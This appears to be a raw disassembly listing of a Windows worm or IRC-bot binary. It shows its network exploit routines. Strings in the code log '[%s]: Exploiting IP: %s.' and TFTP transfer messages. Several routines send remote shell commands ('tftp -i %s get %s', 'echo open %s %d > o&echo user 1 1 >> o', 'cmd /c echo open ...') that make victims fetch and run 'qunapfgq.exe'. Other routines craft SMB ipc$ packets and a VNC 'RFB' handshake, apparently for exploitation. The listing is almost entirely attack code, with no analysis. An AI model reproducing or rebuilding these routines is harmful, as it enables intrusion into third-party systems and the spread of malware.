call sub_41BF70
add esp, 10h
lea eax, [ebp-0Ch]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_432424
push dword ptr [ebp-4]
call ds:dword_4270F4 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_40E059
lea eax, [ebp-14h]
push ebx
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call ds:dword_4270F0 ; WriteFile
test eax, eax
jnz short loc_40E077
loc_40E059: ; CODE XREF: .text:0040E03F�j
push esi
call sub_41BA91
push dword ptr [ebp-8]
call sub_41BA91
pop ecx
pop ecx
loc_40E069: ; CODE XREF: .text:0040E005�j
push dword ptr [ebp-4]
call ds:dword_427070 ; CloseHandle
jmp loc_40DFC2
; ---------------------------------------------------------------------------
loc_40E077: ; CODE XREF: .text:0040E057�j
lea eax, [ebp-0Ch]
push ebx
push eax
push edi
push esi
push dword ptr [ebp-4]
call ds:dword_4270EC ; ReadFile
push dword ptr [ebp-8]
mov edi, eax
call sub_41BA91
push esi
call sub_41BA91
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_427070 ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_40DC41
cmp edi, 1
pop ecx
jnz loc_40E1DE
jmp loc_40E1CA
; ---------------------------------------------------------------------------
loc_40E0BA: ; CODE XREF: .text:0040DF66�j
lea eax, [ebp+0Ch]
push 1
push eax
call sub_4182CD
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_40E1CA
xor ebx, ebx
push ebx
push 1
push 2
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_40E1CA
push 10h
lea eax, [ebp-24h]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
mov word ptr [ebp-24h], 2
push dword ptr [ebp+0A8h]
call dword_4CB9D4 ; htons
mov [ebp-22h], ax
lea eax, [ebp+0Ch]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp-20h], eax
push ebx
lea eax, [ebp-0Ch]
push esi
push eax
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40DCF9
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp-8], esi
jnz short loc_40E14C
push dword ptr [ebp-4]
jmp short loc_40E1C4
; ---------------------------------------------------------------------------
loc_40E14C: ; CODE XREF: .text:0040E145�j
mov edi, [ebp-4]
lea eax, [ebp-24h]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40E164
loc_40E161: ; CODE XREF: .text:0040E176�j
push esi
jmp short loc_40E1BD
; ---------------------------------------------------------------------------
loc_40E164: ; CODE XREF: .text:0040E15F�j
push ebx
push 48h
push offset dword_432424
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E161
mov esi, 1000h
push ebx
lea eax, [ebp-1338h]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push dword ptr [ebp-0Ch]
push dword ptr [ebp-8]
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E1A5
push dword ptr [ebp-8]
jmp short loc_40E1BD
; ---------------------------------------------------------------------------
loc_40E1A5: ; CODE XREF: .text:0040E19E�j
push ebx
lea eax, [ebp-1338h]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push dword ptr [ebp-8]
cmp eax, 0FFFFFFFFh
jnz short loc_40E1D1
loc_40E1BD: ; CODE XREF: .text:0040E162�j
; .text:0040E1A3�j
call sub_41BA91
pop ecx
push edi
loc_40E1C4: ; CODE XREF: .text:0040E14A�j
call dword_4CBA6C ; closesocket
loc_40E1CA: ; CODE XREF: .text:0040DF7D�j
; .text:0040DFCC�j ...
xor eax, eax
jmp loc_40E28D
; ---------------------------------------------------------------------------
loc_40E1D1: ; CODE XREF: .text:0040E1BB�j
call sub_41BA91
pop ecx
push edi
call dword_4CBA6C ; closesocket
loc_40E1DE: ; CODE XREF: .text:0040E0AF�j
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-234h]
push offset aTftpFileTransf ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_41C266
add esp, 0Ch
xor esi, esi
loc_40E1F8: ; CODE XREF: .text:0040E218�j
lea eax, [ebp-234h]
push eax
call sub_415E19
test eax, eax
pop ecx
jnz short loc_40E21C
push 1388h
call ds:dword_427080 ; Sleep
inc esi
cmp esi, 6
jl short loc_40E1F8
jmp short loc_40E28A
; ---------------------------------------------------------------------------
loc_40E21C: ; CODE XREF: .text:0040E207�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aSymantec ; "Symantec"
push eax
lea eax, [ebp-234h]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call sub_41C266
add esp, 10h
cmp [ebp+0BCh], ebx
jnz short loc_40E268
push ebx
lea eax, [ebp-234h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
add esp, 14h
loc_40E268: ; CODE XREF: .text:0040E249�j
lea eax, [ebp-234h]
push eax
call sub_415D38
mov eax, [ebp+0B0h]
pop ecx
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40E28A: ; CODE XREF: .text:0040E21A�j
push 1
pop eax
loc_40E28D: ; CODE XREF: .text:0040E1CC�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E292 proc near ; CODE XREF: sub_40E3F1+42A�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_C], eax
mov ax, word_433290
push eax
call dword_4CB9D4 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40E3CA
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40E3CA
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_4CB9EC ; recv
mov edi, offset aQunapfgq_exe ; "qunapfgq.exe"
push edi
push edi
push [ebp+arg_0]
call sub_40AA06
pop ecx
mov esi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_41C360
add esp, 18h
push dword_4CB710
push [ebp+arg_0]
call sub_40AA06
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_41C360
add esp, 14h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E3CA
push 1F4h
call ds:dword_427080 ; Sleep
push edi
push offset aS ; "%s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E3CE
loc_40E3CA: ; CODE XREF: sub_40E292+51�j
; sub_40E292+67�j ...
xor al, al
jmp short loc_40E3EC
; ---------------------------------------------------------------------------
loc_40E3CE: ; CODE XREF: sub_40E292+136�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_4CB9EC ; recv
push ebx
call dword_4CBA6C ; closesocket
mov al, 1
loc_40E3EC: ; CODE XREF: sub_40E292+13A�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E292 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E3F1 proc near ; CODE XREF: .text:0040E946�p
; .text:0040E968�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_41C500
mov eax, dword_43341C
push ebx
mov [ebp+var_10], eax
mov eax, dword_433420
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_41C266
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_40E430: ; CODE XREF: sub_40E3F1+4E�j
mov cl, [ebp+esi+var_3C]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_40E430
push 60h
lea eax, [ebp+var_B4]
push offset dword_432EA0
push eax
call sub_41CD20
lea eax, [ebp+var_3C]
push eax
call sub_41B9C0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_41CD20
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC_3+3)
push eax
call sub_41B9C0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_41CD20
lea eax, [ebp+var_3C]
push eax
call sub_41B9C0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_41CD20
lea eax, [ebp+var_3C]
push eax
call sub_41B9C0
shl al, 1
add al, 9
push 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_41CD20
mov ax, word_433290
add esp, 2Ch
push eax
call dword_4CB9D4 ; htons
xor eax, 9999h
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_432BA0
call sub_41CD20
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_40E5ED
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
push eax
call sub_41BF70
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, dword_4332D0[eax]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_41CD20
mov esi, offset dword_432AF0
push esi
call sub_41B9C0
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_41CD20
push 4
lea eax, [ebp+var_11AC]
push offset dword_433408
push eax
call sub_41CD20
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_41CD20
add esp, 40h
push esi
call sub_41B9C0
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_41CD20
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_40E5A6: ; CODE XREF: sub_40E3F1+1C6�j
mov cl, [ebp+esi+var_1CC4]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_40E5A6
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_41BF70
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_41BF70
add esp, 18h
jmp short loc_40E644
; ---------------------------------------------------------------------------
loc_40E5ED: ; CODE XREF: sub_40E3F1+118�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_41BF70
mov esi, offset dword_432AF0
push esi
call sub_41B9C0
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_41CD20
lea eax, [ebp+var_10]
push eax
call sub_41B9C0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_41CD20
mov eax, dword_4332D0
add esp, 2Ch
mov [ebp+var_768], eax
loc_40E644: ; CODE XREF: sub_40E3F1+1FA�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_41BF70
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E683
loc_40E67C: ; CODE XREF: sub_40E3F1+2B9�j
; sub_40E3F1+2E0�j ...
xor al, al
jmp loc_40E82B
; ---------------------------------------------------------------------------
loc_40E683: ; CODE XREF: sub_40E3F1+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push 68h
push offset dword_432F04
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E67C
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push 0A0h
push offset dword_432F70
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E67C
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
cmp [ebp+arg_C0], ebx
jz loc_40E799
push 68h
lea eax, [ebp+var_89B4]
push offset dword_433128
push eax
call sub_41CD20
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_41CD20
push 70h
lea eax, [ebp+var_68DC]
push offset dword_433194
push eax
call sub_41CD20
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_41CD20
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_433208
push eax
call sub_41CD20
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E67C
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_40E7EF
; ---------------------------------------------------------------------------
loc_40E799: ; CODE XREF: sub_40E3F1+2F8�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_433014
push eax
call sub_41CD20
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_41CD20
push 90h
lea eax, [ebp+var_245C]
push offset off_433094
push eax
call sub_41CD20
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_40E7EF: ; CODE XREF: sub_40E3F1+3A6�j
push eax
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E67C
push 12Ch
call ds:dword_427080 ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E292
add esp, 0BCh
test al, al
setnz al
loc_40E82B: ; CODE XREF: sub_40E3F1+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E3F1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+0Ch]
mov word ptr [ebp-14h], 2
push eax
call dword_4CBA14 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40E929
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40E929
push edi
push 89h
push offset dword_432C88
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E929
mov esi, 640h
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
push edi
push 0A8h
push offset dword_432D14
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E929
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
push edi
push 0DEh
push offset dword_432DC0
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E929
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_40E933
dec eax
jz short loc_40E930
loc_40E929: ; CODE XREF: .text:0040E884�j
; .text:0040E89A�j ...
xor eax, eax
jmp loc_40E9F6
; ---------------------------------------------------------------------------
loc_40E930: ; CODE XREF: .text:0040E927�j
push edi
jmp short loc_40E957
; ---------------------------------------------------------------------------
loc_40E933: ; CODE XREF: .text:0040E924�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E3F1
add esp, 0C4h
test al, al
jnz short loc_40E977
push 1
loc_40E957: ; CODE XREF: .text:0040E931�j
push ebx
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E3F1
add esp, 0C4h
test al, al
jz short loc_40E97E
loc_40E977: ; CODE XREF: .text:0040E953�j
mov dword ptr [ebp-4], 1
loc_40E97E: ; CODE XREF: .text:0040E975�j
push ebx
call dword_4CBA6C ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_40E9F3
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aSymantec ; "Symantec"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call sub_41C360
push 0
lea eax, [ebp-214h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
lea eax, [ebp-214h]
push eax
call sub_415D38
mov eax, [ebp+0B0h]
add esp, 2Ch
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40E9F3: ; CODE XREF: .text:0040E989�j
push 1
pop eax
loc_40E9F6: ; CODE XREF: .text:0040E92B�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9FB proc near ; CODE XREF: sub_40EAE9+91�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_4271F0 ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4271F4 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_427204 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40EAC9
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_4271F8 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40EAC9
mov edi, 400h
push esi
mov esi, ds:dword_4271FC
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset aQunapfgq_exe ; "qunapfgq.exe"
push eax
push eax
push dword_4CB710
push [ebp+arg_0]
call sub_40AA06
pop ecx
push eax
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41C360
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_427208 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40EACD
loc_40EAC9: ; CODE XREF: sub_40E9FB+50�j
; sub_40E9FB+62�j
xor eax, eax
jmp short loc_40EAE4
; ---------------------------------------------------------------------------
loc_40EACD: ; CODE XREF: sub_40E9FB+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_427200 ; closesocket
push 1
pop eax
loc_40EAE4: ; CODE XREF: sub_40E9FB+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E9FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EAE9 proc near ; CODE XREF: sub_40C3E8+1EA�p
; DATA XREF: .data:off_4317FC�o
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+arg_4]
push edi
push eax
mov [ebp+var_10], 2
call dword_4CBA14 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_C], eax
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_427204 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EB5B
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4271F8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EB3C
push esi
jmp short loc_40EB55
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40EAE9+4E�j
push 0
push 1213h
push offset dword_433424
push esi
call ds:dword_427208 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40EB5F
loc_40EB55: ; CODE XREF: sub_40EAE9+51�j
call ds:dword_427200 ; closesocket
loc_40EB5B: ; CODE XREF: sub_40EAE9+3C�j
xor eax, eax
jmp short loc_40EBA1
; ---------------------------------------------------------------------------
loc_40EB5F: ; CODE XREF: sub_40EAE9+6A�j
call ds:dword_427200 ; closesocket
push 216Bh
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E9FB
add esp, 0C0h
test eax, eax
jz short loc_40EB9E
mov eax, [ebp+arg_A8]
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40EB9E: ; CODE XREF: sub_40EAE9+9E�j
push 1
pop eax
loc_40EBA1: ; CODE XREF: sub_40EAE9+74�j
pop edi
pop esi
leave
retn
sub_40EAE9 endp
; =============== S U B R O U T I N E =======================================
sub_40EBA5 proc near ; CODE XREF: .text:0040EC93�p
; .text:0040ECF5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
loc_40EBAD: ; CODE XREF: sub_40EBA5+2D�j
test edi, edi
jle short loc_40EBD8
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call dword_4CB9EC ; recv
test eax, eax
jz short loc_40EBD4
cmp eax, 0FFFFFFFFh
jz short loc_40EBD4
sub edi, eax
add esi, eax
jmp short loc_40EBAD
; ---------------------------------------------------------------------------
loc_40EBD4: ; CODE XREF: sub_40EBA5+22�j
; sub_40EBA5+27�j
xor eax, eax
jmp short loc_40EBDB
; ---------------------------------------------------------------------------
loc_40EBD8: ; CODE XREF: sub_40EBA5+A�j
push 1
pop eax
loc_40EBDB: ; CODE XREF: sub_40EBA5+31�j
pop edi
pop esi
retn
sub_40EBA5 endp
; =============== S U B R O U T I N E =======================================
sub_40EBDE proc near ; CODE XREF: .text:0040ECDF�p
; .text:0040ED0C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_40EC1B
xor esi, esi
test edi, edi
jle short loc_40EC15
loc_40EBEE: ; CODE XREF: sub_40EBDE+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EC1B
test eax, eax
jz short loc_40EC1B
add esi, eax
cmp esi, edi
jl short loc_40EBEE
loc_40EC15: ; CODE XREF: sub_40EBDE+E�j
push 1
pop eax
loc_40EC18: ; CODE XREF: sub_40EBDE+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EC1B: ; CODE XREF: sub_40EBDE+8�j
; sub_40EBDE+2B�j ...
xor eax, eax
jmp short loc_40EC18
sub_40EBDE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 24Ch
push ebx
mov ax, word_4346DC
push esi
push edi
push 0
push 1
push 2
mov [ebp-2], ax
pop esi
push esi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_40EC4D
push eax
jmp short loc_40EC81
; ---------------------------------------------------------------------------
loc_40EC4D: ; CODE XREF: .text:0040EC48�j
lea eax, [ebp+0Ch]
push eax
call dword_4CBA14 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-48h], eax
mov [ebp-4Ch], si
call dword_4CB9D4 ; htons
mov [ebp-4Ah], ax
lea eax, [ebp-4Ch]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EC8C
push ebx
loc_40EC81: ; CODE XREF: .text:0040EC4B�j
call dword_4CBA6C ; closesocket
jmp loc_40EE87
; ---------------------------------------------------------------------------
loc_40EC8C: ; CODE XREF: .text:0040EC7E�j
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-20h]
and byte ptr [ebp-2Ch], 0
push eax
lea eax, [ebp-28h]
push eax
lea eax, [ebp-38h]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_41CCE3
add esp, 10h
cmp eax, esi
jnz loc_40EE80
cmp dword ptr [ebp-28h], 3
jz short loc_40ECD8
cmp dword ptr [ebp-20h], 8
jnz loc_40EE80
loc_40ECD8: ; CODE XREF: .text:0040ECCC�j
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40EBDE
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-3Ch]
push esi
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-2]
push 1
push eax
push ebx
call sub_40EBDE
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-24h]
push 4
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
mov eax, [ebp-24h]
mov edi, 0FF0000h
mov ecx, eax
mov edx, eax
and ecx, edi
mov esi, 0FF00h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, esi
or edx, eax
shr ecx, 8
shl edx, 8
or ecx, edx
mov [ebp-24h], ecx
jnz loc_40EE80
push 1
push offset word_4CB88C
push ebx
call sub_40EBDE
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-1Ch]
push 18h
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
xor eax, eax
mov ecx, [ebp-8]
mov al, [ebp-1Bh]
mov edx, ecx
mov ah, [ebp-1Ch]
mov [ebp-1Ch], ax
xor eax, eax
mov al, [ebp-19h]
mov ah, [ebp-1Ah]
mov [ebp-1Ah], ax
xor eax, eax
mov al, [ebp-13h]
mov ah, [ebp-14h]
mov [ebp-14h], ax
xor eax, eax
mov al, [ebp-11h]
mov ah, [ebp-12h]
mov [ebp-12h], ax
xor eax, eax
mov al, [ebp-0Fh]
mov ah, [ebp-10h]
mov [ebp-10h], ax
mov eax, ecx
and eax, edi
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-8], eax
add eax, 2
push eax
call sub_41D9A5
